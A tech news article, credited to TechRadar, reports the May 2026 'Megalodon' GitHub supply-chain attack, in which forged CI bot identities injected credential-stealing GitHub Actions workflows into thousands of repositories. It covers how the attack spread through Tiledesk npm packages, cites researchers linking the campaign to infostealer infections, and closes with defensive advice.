The Megalodon GitHub supply-chain attack represents one of the fastest and most coordinated assaults on open-source infrastructure ever recorded. On May 18, 2026, attackers pushed 5,718 malicious commits across 5,561 distinct repositories in roughly six hours, weaponizing GitHub Actions workflows to steal credentials, API keys, and authentication tokens from thousands of development environments.
Key Takeaways
- 5,718 malicious commits targeted 5,561 GitHub repositories in a six-hour window on May 18, 2026
- Attackers used GitHub Actions workflows to exfiltrate AWS credentials, GCP tokens, Azure credentials, SSH keys, and database connection strings
- Over 33% of affected account usernames matched computers infected by infostealer malware, suggesting credential theft enabled the campaign
- The attack was discovered after malicious versions of the Tiledesk open-source chat platform were published to npm
- Dormant backdoors were planted in repositories, designed to trigger on pull requests and code pushes
How the Megalodon GitHub supply-chain attack unfolded
The GitHub supply-chain attack began at approximately 11:36 UTC on May 18 and concluded by 17:48 UTC the same day, with automated malicious commits flooding repositories across a coordinated six-hour window. The initial malicious commit was authored by a forged identity called “build-bot,” one of several fake personas—including “auto-ci,” “ci-bot,” and “pipeline-bot”—designed to blend in with legitimate CI/CD automation. SafeDep’s investigation revealed that 2,878 commits were tied to one email address and 2,841 commits to a second, totaling the full 5,718-commit assault.
What made this GitHub supply-chain attack especially dangerous was its architectural focus: rather than poisoning application code directly, attackers targeted the build and deployment machinery itself. The malicious payloads inserted GitHub Actions workflows into compromised repositories, with some workflows configured to trigger on every push and pull request, executing immediately to steal secrets from CI/CD runners. Other workflows were planted as dormant backdoors, lying in wait until a specific trigger event activated them.
Credentials harvested in the Megalodon GitHub supply-chain attack
The GitHub supply-chain attack was designed to cast the widest possible net for sensitive data. According to SafeDep, the exfiltrated credentials included CI environment variables, AWS credentials, GCP access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, GitHub Actions tokens, and GitLab CI/CD tokens. For any developer running automated builds on compromised repositories, their entire authentication layer became exposed to attackers within minutes of the malicious commit landing.
Hudson Rock’s analysis uncovered a critical detail: the accounts enabling the Megalodon GitHub supply-chain attack were “exclusively sourced from infostealer data,” meaning the attackers had purchased or obtained compromised credentials from the dark web rather than conducting phishing campaigns or brute-force attacks. Of 978 unique usernames tied to affected repositories, 331 matched computers already infected by infostealer malware—a 33% overlap that suggests the campaign was opportunistic, exploiting developers whose machines were already compromised. This finding underscores a harsh reality: if a developer’s personal computer is infected with credential-stealing malware, GitHub becomes an open door for supply-chain sabotage.
Discovery and the Tiledesk connection
Security researchers discovered the Megalodon GitHub supply-chain attack after detecting malicious versions of Tiledesk, an open-source live chat and chatbot platform, published to npm between May 19 and May 21. The infected packages contained the backdoors planted in Tiledesk’s repository during the May 18 assault, creating a downstream propagation vector that could reach any developer who installed the compromised Tiledesk packages. This discovery mechanism—finding the attack through poisoned npm packages rather than detecting the GitHub-side intrusions first—reveals how the GitHub supply-chain attack could have spread silently for longer if Tiledesk maintainers had not noticed the suspicious commits.
Other repositories were hit with the same malicious workflows. The Black-Iron-Project and Tiledesk emerged as the most-targeted groups, though the attack’s scale suggests attackers were operating with a list of high-value targets rather than indiscriminately compromising repositories. The fact that the assault landed within a six-hour window indicates pre-planned coordination and access to multiple compromised accounts, all weaponized simultaneously to maximize impact before defenders could respond.
Why infostealer-driven attacks represent a critical GitHub risk
Hudson Rock’s conclusion carries urgent implications: “The Megalodon campaign is a stark reminder that if developers and employees are infected with infostealers, platforms like GitHub become the launchpad for devastating cascading events”. Unlike traditional account takeovers, which often trigger security alerts, infostealer-sourced credentials allow attackers to move at the speed of automation. A compromised developer account can inject malicious code into hundreds of repositories in minutes, and GitHub Actions workflows can execute that code in thousands of CI/CD pipelines before any human notices the commits.
The GitHub supply-chain attack also highlights a gap in endpoint security. Many developers prioritize securing their GitHub accounts with two-factor authentication but neglect the personal machines where they store SSH keys, API tokens, and cached credentials. An infostealer running on a developer’s laptop can harvest authentication material that no GitHub security setting can protect against. This asymmetry—strong cloud security paired with weak endpoint hygiene—is exactly what the Megalodon campaign exploited.
Frequently asked questions
What is the Megalodon malware campaign?
Megalodon is a coordinated GitHub supply-chain attack that pushed 5,718 malicious commits to 5,561 repositories on May 18, 2026, using forged CI/CD bot identities and stolen developer credentials to inject malicious GitHub Actions workflows. The workflows were designed to exfiltrate secrets from CI/CD environments and plant dormant backdoors in repositories.
How did the Megalodon GitHub supply-chain attack spread to npm?
The attack spread to npm when malicious commits in the Tiledesk repository were published as poisoned npm packages between May 19 and May 21, 2026. Any developer who installed the infected Tiledesk packages would have downloaded the backdoors planted during the May 18 GitHub assault, creating a downstream supply-chain propagation vector.
How can developers protect against infostealer-driven GitHub attacks?
Developers should assume that any credentials stored on their local machines—including SSH keys, API tokens, and cached authentication—are vulnerable to infostealer malware. Enabling two-factor authentication on GitHub accounts helps, but the most critical step is keeping endpoint security up to date and avoiding credential reuse across systems. Organizations should also audit GitHub Actions workflows in their repositories and restrict which accounts can modify CI/CD configurations.
The Megalodon GitHub supply-chain attack demonstrates that scale and speed are now the defining characteristics of modern supply-chain threats. When attackers control dozens of compromised developer accounts and coordinate their actions across a six-hour window, traditional detection methods fail. The attack’s discovery through npm packages rather than GitHub security alerts suggests that many similar intrusions may already be in the wild, waiting to be discovered or weaponized. For development teams relying on open-source dependencies, this campaign should serve as a wake-up call: supply-chain security begins with endpoint security, and credential theft is now the primary attack vector for compromising GitHub itself.
Edited by the All Things Geek team.
Source: TechRadar
